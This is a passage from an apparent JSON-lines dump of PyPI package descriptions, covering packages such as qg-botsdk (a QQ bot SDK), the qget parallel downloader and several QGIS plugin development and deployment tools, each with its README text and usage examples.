"\u5f15\u8a00\u5bf9\u4e8e\u4f7f\u7528python\u8fdb\u884c\u9891\u9053\u5b98\u65b9\u673a\u5668\u4eba\u5f00\u53d1\u800c\u8a00\uff0c\u5e02\u9762\u4e0a\u786e\u5b9e\u6709\u4e0d\u540c\u7684sdk\u53ef\u4ee5\u9009\u7528\uff0c\u4f46\u5176\u5f88\u591a\u53ea\u63d0\u4f9b\u5f02\u6b65asyncio+\u7c7b\u7ee7\u627f\u7684\u5f00\u53d1\u65b9\u5f0f\uff0c\u5bf9\u4e8e\u4e0d\u4f1a\u76f8\u5173\u6280\u5de7\u7684\u670b\u53cb\u4eec\uff0c\u5c24\u5176\u65b0\u624b\uff0c\u4f1a\u6709\u5f00\u53d1\u96be\u5ea6\u3002\u4e3a\u6b64\uff0cqg_botsdk\u76f8\u5e94\u63d0\u4f9b\u4e86\u53e6\u4e00\u4e2a\u9009\u62e9\uff0c\u8fd9\u4e00\u6b3esdk\u867d\u7136\u540c\u6837\u4f7f\u7528asyncio\u7f16\u5199sdk\u5e95\u5c42\uff0c\u4f46\u5176\u540c\u65f6\u63d0\u4f9b\u4e86threading\u548casyncio\u5c01\u88c5\u4e0b\u7684\u5e94\u7528\u5c42\u8c03\u7528\uff0c\u4ee5\u62bd\u8c61\u5316\u5c01\u88c5\u7684\u5e93\u7f16\u5199\u65b9\u5f0f\uff0c\u6781\u5927\u5730\u964d\u4f4e\u5e94\u7528\u5c42\u7684\u5f00\u53d1\u96be\u5ea6\u3002\u4eae\u70b9\u4e24\u79cd\u5e94\u7528\u5c42\u5f00\u53d1\u65b9\u5f0f\uff08threading\u3001asyncio\uff09\uff0c\u53ef\u6839\u636e\u81ea\u5df1\u7684\u559c\u597d\u9009\u62e9\uff0c\u800c\u5e95\u5c42\u5747\u4e3aasyncio\u5b9e\u73b0\uff0c\u4fdd\u6301\u9ad8\u5e76\u53d1\u80fd\u529b\u7075\u6d3b\u7684\u6784\u5efa\u65b9\u5f0f\uff0c\u5373\u4f7f\u5b98\u65b9\u5220\u9664\u6216\u65b0\u589e\u5b57\u6bb5\uff0cSDK\u4e5f\u4e0d\u4f1a\u89c4\u8303\u4e8e\u539f\u6765\u7684\u6570\u636e\u683c\u5f0f\uff0c\u800c\u4f1a\u628a\u771f\u5b9e\u6570\u636e\u53cd\u9988\u7ed9\u4f60\u8f7b\u91cf\uff0c\u7b80\u6d01\uff0c\u7edf\u4e00\u7684\u4ee3\u7801\u7ed3\u6784\uff0c\u901a\u8fc7\u5f55\u5165\u56de\u8c03\u51fd\u6570\u5904\u7406\u4e0d\u540c\u4e8b\u4ef6\uff0c10\u884c\u5373\u53ef\u6784\u5efa\u4e00\u4e2a\u7b80\u5355\u7684\u7a0b\u5e8f\u5bb9\u6613\u5165\u95e8\uff0c\u65e0\u9700\u5b66\u4f1aasyncio\u3001\u7c7b\u7ee7\u627f\u7b49\u7f16\u7a0b\u6280\u5de7\u4e5f\u53ef\u4f7f\u7528\uff0c\u540c\u65f6\u4fdd\u7559\u8f83\u9ad8\u5e76\u53d1\u80fd\u529b\u4fdd\u7559\u5b98\u65b9http API\u4e2dJson\u6570\u636e\u7684\u7ed3\u6784\u5b57\u6bb5\uff0c\u5e26\u4f60\u5b66\u4e60\u5b98\u65b9\u7ed3\u6784\uff0c\u65e5\u540e\u53ef\u81ea\u884c\u5f00\u53d1\u9002\u5408\u81ea\u5df1\u7684SDK\u7b80\u5355\u6613\u7528\u7684plugins\u7f16\u5199\u4e0e\u52a0\u8f7d\uff0c\u4f7f\u7528\u4f8b\u5b50\u53ef\u53c2\u9605example_13(\u88c5\u9970\u5668).py\u65b9\u4fbf\u591a\u573a\u666f\uff08\u9891\u9053+\u7fa4\u7b49\uff09\u6784\u5efa\u673a\u5668\u4eba\u7684\u62bd\u8c61\u5316\u5c01\u88c5\uff0c\u4f7f\u7528\u4f8b\u5b50\u53ef\u53c2\u9605example_16(Q\u7fa4\u7b80\u5355\u5de5\u4f5c\u6d41).py\u4e0b\u8f7d\u65b9\u5f0f\u76f4\u63a5\u4e0b\u8f7d\u6700\u65b0release\uff0c\u653e\u5230\u9879\u76ee\u4e2d\u5373\u53efpip\u5b89\u88c5\uff08\u63a8\u8350\uff09\uff1apipinstallqg-botsdk\u6ce8\u610f\u662fqg-botsdk\uff08\u4e2d\u7ebf\uff09\uff0c\u4e0d\u662fqg_botsdk\uff08\u5e95\u7ebf\uff09\u4e00\u4e2a\u7b80\u5355\u7684\u5de5\u4f5c\u6d41- \u6ce8\u518cBOT\u5b9e\u4f8b\uff0c\u5f55\u5165\u673a\u5668\u4eba\u5e73\u53f0\u83b7\u53d6\u7684ID\uff08BotAppId\u5f00\u53d1\u8005ID\uff09\u548ctoken\uff08\u673a\u5668\u4eba\u4ee4\u724c\uff09- \u7f16\u5199\u63a5\u6536\u4e8b\u4ef6\u7684\u51fd\u6570->\u4e0b\u65b9\u4f8b\u5b50\uff1adef deliver(data)\uff0c\u5e76\u53ef\u501f\u52a9model\u5e93\u68c0\u67e5\u6570\u636e\u683c\u5f0f\uff08data: Model.MESSAGE\uff09- \u7ed1\u5b9a\u63a5\u6536\u4e8b\u4ef6\u7684\u51fd\u6570\uff08bind_msg\u3001bind_dm\u3001bind_msg_delete\u3001bind_guild_event\u3001bind_guild_member\u3001bind_reaction\u3001bind_interaction\u3001bind_audit\u3001bind_forum\u3001bind_audio\uff09- 
\u5f00\u59cb\u8fd0\u884c\u673a\u5668\u4eba\uff1abot.start()fromqg_botsdkimportBOT,Model# \u5bfc\u5165SDK\u6838\u5fc3\u7c7b\uff08BOT\uff09\u3001\u6240\u6709\u6570\u636e\u6a21\u578b\uff08Model\uff09bot=BOT(bot_id='xxx',bot_token='xxx',is_private=True,is_sandbox=True)# \u5b9e\u4f8b\u5316SDK\u6838\u5fc3\u7c7b@bot.bind_msg()# \u7ed1\u5b9a\u63a5\u6536\u6d88\u606f\u4e8b\u4ef6\u7684\u51fd\u6570defdeliver(data:Model.MESSAGE):# \u521b\u5efa\u63a5\u6536\u6d88\u606f\u4e8b\u4ef6\u7684\u51fd\u6570if'\u4f60\u597d'indata.treated_msg:# \u5224\u65ad\u6d88\u606f\u662f\u5426\u5b58\u5728\u7279\u5b9a\u5185\u5bb9data.reply('\u4f60\u597d\uff0c\u4e16\u754c')# \u53d1\u9001\u88ab\u52a8\u56de\u590d\uff08\u5e26message_id\u76f4\u63a5reply\u56de\u590d\uff09# \u5982\u9700\u4f7f\u7528\u5982 Embed \u7b49\u6d88\u606f\u6a21\u677f\uff0c\u53ef\u4f20\u5165\u76f8\u5e94\u7ed3\u6784\u4f53\uff0c \u5982\uff1a# data.reply(ApiModel.MessageEmbed(title=\"\u4f60\u597d\", content=\"\u4e16\u754c\"))if__name__=='__main__':bot.start()# \u5f00\u59cb\u8fd0\u884c\u673a\u5668\u4eba\u5df2\u5b9e\u73b0\u4e8b\u4ef6\u63a5\u6536\uff08\u5df2\u652f\u6301\u89e3\u6790\u8bba\u575b\u4e8b\u4ef6\uff09from qg_botsdk.model import Model\n\u6b64\u5e93\u4e3a\u6240\u6709\u4e8b\u4ef6\u7684\u6570\u636e\u683c\u5f0f\u7ed3\u6784\uff0c\u53ef\u5957\u7528\u5230\u4ee3\u7801\u4ee5\u68c0\u67e5\u7ed3\u6784\u662f\u5426\u6b63\u786ebind_msgbind_dmbind_msg_deletebind_guild_eventbind_guild_memberbind_reactionbind_interactionbind_auditbind_forumbind_audio\u5df2\u5b9e\u73b0API- API\u5df2\u57fa\u672c\u5b8c\u5584\uff0c\u5177\u4f53\u8be6\u60c5\u53ef\u67e5\u9605\uff1ahttps://qg-botsdk.readthedocs.io/zh_CN/latest/API.html\n- \u5173\u4e8eAPI\u7684\u66f4\u591a\u8be6\u7ec6\u4fe1\u606f\u53ef\u9605\u8bfb\u5b98\u65b9\u6587\u6863\u4ecb\u7ecd\uff1ahttps://bot.q.qq.com/wiki/develop/api/get_bot_idget_bot_infoget_bot_guildsget_guild_infoget_guild_channelsget_channels_infocreate_channelspatch_channelsdelete_channelsget_guild_membersget_role_membersget_member_infodelete_memberget_guild_rolescreate_rolepatch_roledelete_rolecreate_role_memberdelete_role_memberget_channel_member_permissionput_channel_member_permissionget_channel_role_permissionput_channel_role_permissionget_message_infosend_msgsend_embed\uff08\u5df2\u5e9f\u5f03\uff09send_ark_23\uff08\u5df2\u5e9f\u5f03\uff09send_ark_24\uff08\u5df2\u5e9f\u5f03\uff09send_ark_37\uff08\u5df2\u5e9f\u5f03\uff09send_markdown\uff08\u5df2\u5e9f\u5f03\uff09delete_msgget_guild_settingcreate_dm_guildsend_dmdelete_dm_msgmute_all_membermute_membermute_memberscreate_announcedelete_announcecreate_pinmsgdelete_pinmsgget_pinmsgget_schedulesget_schedule_infocreate_schedulepatch_scheduledelete_schedulecreate_reactiondelete_reactionget_reaction_userscontrol_audiobot_on_micbot_off_micget_threadsget_thread_infocreate_threaddelete_threadget_guild_permissionscreate_permission_demandupload_mediasend_qq_dmsend_group_msg\u7279\u6b8a\u529f\u80fdregister_start_event\uff1a\u7ed1\u5b9a\u4e00\u4e2a\u5728\u673a\u5668\u4eba\u5f00\u59cb\u8fd0\u884c\u540e\u9a6c\u4e0a\u6267\u884c\u7684\u51fd\u6570register_repeat_event\uff1a\u7ed1\u5b9a\u4e00\u4e2a\u80cc\u666f\u91cd\u590d\u8fd0\u884c\u7684\u51fd\u6570security_check\uff1a\u7528\u4e8e\u4f7f\u7528\u817e\u8baf\u5185\u5bb9\u68c0\u6d4b\u63a5\u53e3\u8fdb\u884c\u5185\u5bb9\u68c0\u6d4b\u76f8\u5173\u94fe\u63a5\u6587\u6863\uff1areadthedocs\u5b98\u65b9\u6ce8\u518c\u673a\u5668\u4eba\uff1ahttps://q.qq.com/#/\u5b98\u65b9API\u6587\u6863\uff1ahttps://bot.q.qq.com/wiki/develop/api/SDK QQ\u4ea4\u6d41\u7fa4\uff1ahttps://jq.qq.com/?_wv=1027&k=3NnWvGpz"} 
+{"package": "qg-common-sdk", "pacakge-description": "\u5e95\u5c42\u5c01\u88c5\u5de5\u5177\u7c7b\u5f02\u5e38\u5904\u7406\u81ea\u5b9a\u4e49\u5f02\u5e38\u4fe1\u606f\ncatchException.py# \u4e1a\u52a1\u5f02\u5e38\u7c7b\u5c01\u88c5\nclass BusinessException(Exception):\n def __init__(self, data: str,msg: str):\n self.data = data\n self.code = StatusCode.BUSINESSEXEC\n self.msg = msg\n# \u5f02\u5e38\u5c01\u88c5\u7c7b\nclass SysException(Exception):\n def __init__(self, data: str,msg: str):\n self.data = data\n self.code = StatusCode.SYSEXEC\n self.msg = msg\u9700\u8981\u5f02\u5e38\u5904\u7406\u7684\u63a5\u53e3\u4e0a\uff0c\u6dfb\u52a0exec_catch_func\u88c5\u9970\u5668\u5373\u53ef\u3002\u8fd4\u56de\u503c\u4fe1\u606f\u7edf\u4e00\u5c01\u88c5returnInfo.py\n\u6bcf\u4e2a\u9700\u8981\u7edf\u4e00\u8fd4\u56de\u503c\u7684\u63a5\u53e3\u4e0a\uff0c\u6dfb\u52a0return_info_func\u88c5\u9970\u5668\u5373\u53ef\u3002\nreturn_info_func \u4e2d\u5c01\u88c5\u4e86\u5f02\u5e38\u5904\u7406\uff0c\u5f02\u5e38\u65e5\u5fd7\u8bb0\u5f55\uff0c\u64cd\u4f5c\u65e5\u5fd7\u8bb0\u5f55\u7b49\u5b57\u5178\u7edf\u4e00\u5904\u7406dictOpr.py\n\u5b57\u5178\u7edf\u4e00\u5904\u7406\u7c7b\uff0c\u652f\u6301\u5185\u5b58\u7f13\u5b58\uff0c\u63d0\u4f9b\u5b57\u5178\u67e5\u8be2\uff0c\u6e05\u9664\u7f13\u5b58\u63a5\u53e3\uff0c\u672a\u6765\u53ef\u4ee5\u652f\u6301redis\u7f13\u5b58\u3002\u83b7\u53d6\u7528\u6237\u4fe1\u606foperUserInfo.py\n\u63d0\u4f9b\u63a5\u53e3\u4eceredis\u4e2d\u83b7\u53d6\u5f53\u524d\u7528\u6237\u4fe1\u606f\u65f6\u95f4\u8f6c\u6362\u5de5\u5177dateTool.py \u65f6\u95f4\u8f6c\u6362\u5de5\u5177\u7cfb\u7edf\u5de5\u5177sysTool.py \u64cd\u4f5c\u7cfb\u7edf\u53c2\u6570\u7684\u51fd\u6570\u5c01\u88c5"} +{"package": "qg.core", "pacakge-description": "[![](https://api.travis-ci.org/QunarOPS/qg.core.png?branch=master)](https://travis-ci.org/QunarOPS/qg.core)\nquickgears.core\n===============\u4e00\u5806\u5de5\u5177"} +{"package": "qg.db", "pacakge-description": "[![](https://api.travis-ci.org/QunarOPS/qg.db.png?branch=master)](https://travis-ci.org/QunarOPS/qg.db)Quick Gear Database===============\u6570\u636e\u64cd\u4f5c\u5c01\u88c5"} +{"package": "qgel", "pacakge-description": "A quick way to use the qgel embedding"} +{"package": "qgen", "pacakge-description": "Generate a random value of questions based on a template"} +{"package": "qgeneration", "pacakge-description": "Data generation libraryInstallation$pipinstallqgenerationTesting$pythonsetup.pytestLicensingThe code in this project is licensed under MIT license."} +{"package": "qgepqwat2ili", "pacakge-description": "No description available on PyPI."} +{"package": "qget", "pacakge-description": "qgetis an Apache2 licensed library, written in Python, for downloading web\nresources in asynchronous manner as fast as possible.Under the hood it benefits fromasyncioandaiohttpto create multiple\nsimultaneous connections to resource and download it using buffered part files.Table of ContentsFeaturesMotivation:wgetvsqgetRequirementsInstallationBuildUsagePython codeProgress hooksCommand lineNotesLimiterPart sizeHistory0.1.7 (2023-05-15)0.1.6 (2023-05-15)0.1.5 (2023-01-25)0.1.4 (2022-08-25)0.1.1 (2022-06-09)0.0.8 (2022-06-04)0.0.6 (2022-05-31)0.0.1 (2022-05-31)Featuresan executable script to download file via command linesupport for HTTPS connection with basic auth and SSL verification skipsupport for custom headersautomatic measurement of simultaneous connections limitsupport for limiting download ratesupport for retries during part downloadingsupport for downloading / rewriting progress with callbacks (by 
default usingtqdm)support for limiting RAM usage with settingschunk_bytesandmax_part_mbsupport for using own event loop inasynciobyqget_corocoroutinesupport for SOCKS4(a), SOCKS5(h), HTTP (tunneling) proxyMotivation:wgetvsqgetConsider simplenginxconfiguration fragment like this:http{server{...limit_rate5m;...}}Now let\u2019s compare download statistics forwgetandqgetfor1000MBfile and configuration\nmentioned above:ApplicationTotal time [s]AVG Speed [MB/s]Detailswget251.343.98qget16.0095.97Connection limit test: 5.00sDownload: 10.42sParts rewrite: 0.58sConclusion:For simple rate limiting (per connection)qgetallows to achievemultiple times fasterdownload speed\nbased on user internet connection speed, number of simultaneous requests and resource server configuration.\nIn example aboveqgetachieved over24xdownload speed ofwget.For more complicated cases (e.g. connections limit per IP) automatic connection limit measurement test was\ncreated to calculate how many simultaneous requests could be achieved before server rejects next one.RequirementsPython>= 3.7aiohttpaiofilesaiohttp-sockstqdmInstallationYou can download selected binary files fromReleases.\nAvailable versions:Windows 32-bit (qget-0.1.7-win32.exe)Windows 64-bit (qget-0.1.7-win_amd64.exe)POSIX 32-bit (qget-0.1.7-i386)POSIX 64-bit (qget-0.1.7-amd64)To installqgetmodule, simply:$pipinstallqgetBuildMake sureAnacondais installed.To build onWindows(in Anaconda Prompt):$build.batTo build onPOSIX(libc-binandbinutilspackages are required):$build.shUsagePython codeFunction arguments:url (str): The URL to download the resource.\nfilepath (str, optional): Output path for downloaded resource.\n If not set it points to current working directory and filename from url. Defaults to None.\noverride (bool, optional): Flag if existing output file should be override. Defaults to False.\nauth (str, optional): String of user:password pair for SSL connection. Defaults to None.\nverify_ssl (bool, optional): Flag if SSL certificate validation should be performed. Defaults to True.\nmock_browser (bool, optional): Flag if User-Agent header should be added to request. Defaults to True.\n Default User-Agent string: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\n (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36'\nproxy_url (str, optional): HTTP/SOCKS4/SOCKS5 proxy url in format 'protocol://user:password@ip:port'.\n Defaults to None.\nheaders: (Dict[str, str], optional): Custom headers to be sent. Default to None.\n If set user can specify own User-Agent and Accept headers, otherwise defaults will be used.\nprogress_ref (ProgressState, optional): Reference to progress state.\n If passed all parts bytes and rewrite status will be updated in it. Defaults to None.\nmax_connections (int, optional): Maximum amount of asynchronous HTTP connections. Defaults to 50.\nconnection_test_sec (int, optional): Maximum time in seconds assigned to test\n how much asynchronous connections can be achieved to URL.\n If set to 0 test will be omitted. Defaults to 5.\nchunk_bytes (int, optional): Chunk of data read in iteration from url and save to part file in bytes.\n Will be used also when rewriting parts to output file. If limit is supplied this can be override for\n stream iteration. Defaults to 2621440.\nmax_part_mb (float, optional): Desirable (if possible) max part size in megabytes. Defaults to 5.\nretries (int, optional): Retries number for part download. Defaults to 10.\nretry_sec (int, optional): Time to wait between retries of part download in seconds. 
Defaults to 1.\nlimit (str, optional): Download rate limit in MBps. Can be supplied with unit as \"Nunit\", eg. \"5M\".\n Valid units (case insensitive): b, k, m, g, kb, mb, gb. 0 bytes will be treat as no limit.\n Defaults to None.\ntmp_dir (str, optional): Temporary directory path. If not set it points to OS tmp directory.\n Defaults to None.\ndebug (bool, optional): Debug flag. Defaults to False.To use in code simply import module function:fromqgetimportqgeturl=\"https://speed.hetzner.de/100MB.bin\"qget(url)To use in code with own loop andasyncio:importasynciofromqgetimportqget_coroasyncdefmain(loop):url=\"https://speed.hetzner.de/100MB.bin\"download_task=loop.create_task(qget_coro(url))awaitdownload_task# Or just# await qget_coro(url)loop=asyncio.get_event_loop()loop.run_until_complete(main(loop))loop.close()Progress hooksUsage for progress hooks (by default hooks are used to displaytqdmprogress bar):fromqgetimportProgressState,qgetdefprint_download_progress(progress:ProgressState)->None:print(f\"Download:{progress.get_download_progress():.2f}%\",end=\"\\r\")ifprogress.get_download_bytes()==progress.total_bytes:print()defprint_rewrite_progress(progress:ProgressState)->None:print(f\"Rewrite:{progress.get_rewrite_progress():.2f}%\",end=\"\\r\")ifprogress.rewrite_bytes==progress.total_bytes:print()url=\"https://speed.hetzner.de/100MB.bin\"progress=ProgressState(on_download_progress=print_download_progress,on_rewrite_progress=print_rewrite_progress)qget(url,progress_ref=progress)Command lineusage: qget [-h] [-o FILEPATH] [-f] [-a AUTH] [--no-verify] [--no-mock]\n [--proxy PROXY_URL] [-H HEADER] [-c MAX_CONNECTIONS]\n [--test CONNECTION_TEST_SEC] [--bytes CHUNK_BYTES] [--part MAX_PART_MB]\n [--retries RETRIES] [--retry_sec RETRY_SEC] [--limit LIMIT] [--tmp TMP_DIR]\n [--debug] [-v]\n url\n\nDownloads resource from given URL in buffered parts using asynchronous HTTP connections\nwith aiohttp session.\n\npositional arguments:\n url URL of resource\n\noptions:\n -h, --help show this help message and exit\n -o FILEPATH, --output FILEPATH\n Output path for downloaded resource.\n -f, --force Forces file override for output.\n -a AUTH, --auth AUTH String of user:password pair for SSL connection.\n --no-verify Disables SSL certificate validation.\n --no-mock Disables default User-Agent header.\n --proxy PROXY_URL HTTP/SOCKS4/SOCKS5 proxy url in format\n 'protocol://user:password@ip:port'.\n -H HEADER, --header HEADER\n Custom header in format 'name:value'. Can be supplied multiple\n times.\n -c MAX_CONNECTIONS, --connections MAX_CONNECTIONS\n Maximum amount of asynchronous HTTP connections.\n --test CONNECTION_TEST_SEC\n Maximum time in seconds assigned to test how much asynchronous\n connections can be achieved to URL. Use 0 to skip.\n --bytes CHUNK_BYTES Chunk of data read in iteration from url and save to part file in\n bytes. Will be used also when rewriting parts to output file.\n --part MAX_PART_MB Desirable (if possible) max part size in megabytes.\n --retries RETRIES Retries number for part download.\n --retry_sec RETRY_SEC Time to wait between retries of part download in seconds.\n --limit LIMIT Download rate limit in MBps. Can be supplied with unit as 'Nunit',\n eg. '5M'. Valid units (case insensitive): b, k, m, g, kb, mb, gb.\n 0 bytes will be treat as no limit.\n --tmp TMP_DIR Temporary directory path. 
If not set it points to OS tmp\n directory.\n --debug Debug flag.\n -v, --version Displays actual version of qget.Can be used also from python module with same arguments as for binary:python-mqgethttps://speed.hetzner.de/100MB.binMultiple headers can be supplied as follow:python-mqget-H'name1:value1'-H'name2:value2'https://speed.hetzner.de/100MB.binNotesLimiterLimiter tries to reduce rate of downloaded bytes by adding pauses between iteration over resource content.\nIf very low download rate is requested try to lower connections amount (max_connectionsor--connectionsMAX_CONNECTIONS) to achieve better accuracy for limit.Part sizePart size is calculated in runtime based on resource size in bytes and maximum amount of asynchronous\nconnections set by user (or connection test). Max part size param (max_part_mbor--partMAX_PART_MB)\nsupplied by user is use as a top limit for calculated value.part_bytes = min(resource_bytes/connections, max_part_bytes)History0.1.7 (2023-05-15)Added retries and retry_sec parameter validation.0.1.6 (2023-05-15)Fixed multiple logging handlers created with multiple qget calls.Added retries for connection errors during async downloading.0.1.5 (2023-01-25)Updated copyright note.0.1.4 (2022-08-25)Added support for SOCKS4(a), SOCKS5(h), HTTP (tunneling) proxy.Added argument position mixing for command line usage.0.1.1 (2022-06-09)Added rate limiter with multiple unit support.Added version flag for command line usage.Renamed \u2013no-ssl flag to \u2013no-verify.0.0.8 (2022-06-04)Added User-Agent mock settings.Added custom headers support.Fixed auth validation.Fixed error messages in validation.Changed command line arguments for flags (used \u2018-\u2019 instead of \u2018_\u2019).0.0.6 (2022-05-31)Added HTTPS support.Fixed fallback to GET request on failed HEAD Content-Length read.Fixed binary build scripts.0.0.1 (2022-05-31)Initial version."} +{"package": "qg-eureka", "pacakge-description": "python \u8fde\u63a5 EUREKA"} +{"package": "qgis2to3", "pacakge-description": "No description available on PyPI."} +{"package": "qgiscommons", "pacakge-description": "No description available on PyPI."} +{"package": "qgis-deployment-toolbelt", "pacakge-description": "QGIS Deployment CLICross-platform (but Windows focused) CLI to perform deployment operations related to QGIS: profiles, plugins, etc.Try it quicklyUsing Python and the officiel package installerpip:pipinstallqgis-deployment-toolbelt\nqdt-shttps://github.com/Guts/qgis-deployment-cli/raw/main/examples/scenarios/demo-scenario.qdt.ymlOr using a pre-built executable (downloadablethrough releases assets), for example on Windows:QGISDeploymentToolbelt_0-27-0_Windows.exe-shttps://github.com/Guts/qgis-deployment-cli/raw/main/examples/scenarios/demo-scenario.qdt.ymlLook for new icons in start menu or desktop!Interested? 
For further details,read the documentation:books:.ContributeRead thecontribution guidelinesand the documentation."} +{"package": "qgis-plugin-ci", "pacakge-description": "QGIS Plugin CIContains scripts to perform automated testing and deployment for QGIS plugins.\nThese scripts are written for and tested on GitHub, Travis-CI, github workflows and Transifex.Deploy plugin releases on QGIS official plugin repositoryPublish plugin in Github releases, option to deploy a custom repositoryEasily integrated in Travis-CI or github workflowsCompletely handle translations with Transifex:create the project and the languagespull and push translationsall TS/QM files can be managed on the CI, thei18nfolder can be omitted from the Git repositorychangelogsection in the metadata.txt can be populated if the CHANGELOG.md is presentset theexperimentalflag according to the tag if needed:book: For further information, seethe documentation.QGIS-Plugin-CI is best served if you use these two conventions :Semantic versioningKeep A ChangelogCommand lineusage: qgis-plugin-ci [-h] [-v]\n {package,changelog,release,pull-translation,push-translation}\n ...\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version print the version and exit\n\ncommands:\n qgis-plugin-ci command\n\n {package,changelog,release,pull-translation,push-translation}\n package creates an archive of the plugin\n changelog gets the changelog content\n release release the plugin\n pull-translation pull translations from Transifex\n push-translation update strings and push translationsRequirementsThe code is under agitrepository (git archiveis used to bundle the plugin).There is no uncommitted changes when doing a package/release (althought there is an option to bypass this requirement).A configuration at the top directory either in.qgis-plugin-cior insetup.cfgorpyproject.tomlwith a[qgis-plugin-ci]section (seedocs/configuration/options.mdfor details).The source files of the plugin are within a sub-directory with ametadata.txtfile with the following fields:descriptionqgisMinimumVersionrepositorytrackerSeeparameters.pyfor more parameters and details. Notice that the name of this directory will be used for the zip file.QRC and UI filesAny .qrc file in the source top directory (plugin_path) will be compiled and output as filename_rc.py. You can then import it usingimport plugin_path.resources_rcCurrently, qgis-plugin-ci does not compile any .ui file.Publishing pluginsWhen releasing, you can publish the plugin :In the official QGIS plugin repository. You need to provide user name and password for your Osgeo account.As a custom repository in Github releases and which can be added later in QGIS. 
The address will be:https://github.com/__ORG__/__REPO__/releases/latest/download/plugins.xmlBoth can be achieved in the same process.Pre-release and experimentalIn the case of a pre-release (either from the tag name according toSemantic Versioningor from the GitHub release), the plugin will be flagged as experimental.The tool will recognise any label use as a suffix to flag it as pre-release :10.1.0-beta13.4.0-rc.2DebugIn any Python module, you can have a global variable asDEBUG = True, which will be changed toFalsewhen packaging the plugin.Other toolsQGIS-Plugin-RepoQGIS-Plugin-CI can generate theplugins.xmlfile, per plugin.\nIf you want to merge many XML files into one to have a single QGIS plugin repository providing many plugins,\nyou should checkQGIS-Plugin-Repo.\nIt's designed to run on CI after QGIS-Plugin-CI."} +{"package": "qgis-plugin-dev-tools", "pacakge-description": "qgis-plugin-dev-toolsQGIS plugin development and packaging tools, which make managing runtime dependencies easy.PrerequisitesYour plugin package must be available to import from the python environment this tool is run in. For example, runningpython -c \"import your_plugin_package_name\"should not fail. Additionally, any dependency libraries must also be available in the python environment, so a dependency tosome_pypi_packageneeds something likepip install some_pypi_packagefor this tool to work.LimitationsBundling works by copying the code as-is and replacing the imports in all bundled files, so native library dependencies and other special cases might not work. To be safe, only depend on pure python libraries. Also verify the result zip works, since some import statements orsys.modulesusage might not be supported.SetupInstall this library withpip install qgis-plugin-dev-tools.Create apyproject.tomltool section:[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"If the plugin runtime depends on external libraries, add the distribution names toruntime_requireslist as abstract dependencies.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"runtime_requires=[\"some_pypi_package\"]If the plugin runtime dependencies have many dependencies themselves, it is possible to include those recursively withauto_add_recursive_runtime_dependencies. Alternatively, all the requirements can be listed inruntime_requires.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"runtime_requires=[\"some_pypi_package\"]auto_add_recursive_runtime_dependencies=trueIf the plugin runtime dependencies do not work with the aforementioned configuration, the dependencies can be added to the Python Path withuse_dangerous_vendor_sys_path_appendflag. This method might beunsafeif there are conflicts between dependency versions of different plugins.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"runtime_requires=[\"some_pypi_package_with_binary_files\"]use_dangerous_vendor_sys_path_append=trueBy default build version number is read from changelog top-most second level heading having format## version anything. This behaviour is configurable withversion_number_sourceto use plugin package distribution metadata. 
Optionally, the version number can also be provided as an argument for the build script usingqpdt b --version 0.1.0-rc2.[tool.qgis_plugin_dev_tools]plugin_package_name=\"your_plugin_package_name\"version_number_source=\"distribution\"# or \"changelog\" (default if missing)Plugin packagingRunqgis-plugin-dev-tools build(shortqpdt b) to package the plugin and any runtime dependencies to a standard QGIS plugin zip file, that can be installed and published.By default config is read frompyproject.toml, changelog notes fromCHANGELOG.md, version from changelog, and package is created in adistdirectory in the current working directory. Changelog contents and version number are inserted to themetadata.txtfile, so the version and changelog sections do not need manual updates.Plugin publishingRunqgis-plugin-dev-tools publish (shortqpdt publish ) to publish a previously built plugin zip file to QGIS plugin repository.By default username and password are read fromQPDT_PUBLISH_USERNAMEandQPDT_PUBLISH_PASSWORDenvironment variables.Plugin development modeRunqgis-plugin-dev-tools start(shortqpdt s) to launch QGIS with the plugin installed and ready for development.By default config is read frompyproject.tomland runtime config from.envin the current working directory. Extra environment files can be passed using-eflag..envmust configure the executable path, and may configure debugger, profile name and any extra runtime variables necessary for the plugin.QGIS_EXECUTABLE_PATH=# path to qgis-bin/qgis-bin-ltr or .exe equivalents, necessary# DEBUGGER_LIBRARY= # debugpy/pydevd to start a debugger on init, library must be installed to the environment# DEVELOPMENT_PROFILE_NAME= # name of the profile that qgis is launched with, otherwise uses default# any other variables are added to the runtime QGIS environment# SOMETHING=somethingDevelopment mode bootstraps the launched QGIS to have access to any packages available to the launching python environment, setups enviroment variables, configures a debugger, and installs and enables the developed plugin package.Additionally editable installs for the plugin dependencies are supported. For example with a dependency tosome_pypi_package, usepip install -e /path/to/some_pypi_packageto providesome_pypi_packagein editable mode from a local directory, and usePlugin Reloaderto refresh new code when its changed on disk. 
This will also reload the declared dependencies.Developing multiple pluginsDevelopment mode also enables using and developing multiple plugins easily if certain requirements are satisfied for all extra plugins:Extra plugin must be installable python packagesSee e.g.Quickstart for setuptoolsExtra plugin must have entry point in group \"qgis_plugin_dev_tools\"See for example:Entry point usage with setuptoolsUse plugin package name for entry point nameExtra plugin needs to be installed in the same python environment where this tool is run inExtra plugins are loaded on launch and reloaded together with the main plugin ifPlugin Reloaderis used.Development of qgis-plugin-dev-toolsSeedevelopment readme.License & copyrightLicensed under GNU GPL v3.0.Copyright (C) 2022National Land Survey of Finland.ChangelogAll notable changes to this project will be documented in this file.The format is based onKeep a Changelog, and this project adheres toSemantic Versioning.0.6.2- 2023-09-27Fix: Fix issues with bundling requirements of the requirements recursively0.6.1- 2023-09-06update author email0.6.0- 2023-02-17Feat: Support dependencies having package references in .ui files0.5.0- 2022-11-09Feat: Add publish command to cliFix: Support build without actually importing the codeFix: Preserve case for key names in metadata file0.4.0- 2022-11-01Feat: Add an option to get version from distribution metadataFix: Rewrite imports correctly when dependency name is a prefix of the plugin package name0.3.0- 2022-09-02Feat: Add an option to append vendor package to the Python PathFeat: Add an option to bundle requirements of the requirements recursivelyFeat: Add module packages and .pyd files to the bundle if foundFeat: Add version as an optional build argumentChore: Drop support from Python < 3.90.2.1- 2022-07-07Fix: Correct some plain import rewrites0.2.0- 2022-06-13Feat: enable extra plugins in development mode0.1.2- 2022-05-30Fix: use UTF-8 encoding for file reads/writes0.1.1- 2022-05-16Fix: rewrite runtime requirement imports correctly0.1.0- 2022-05-12Initial 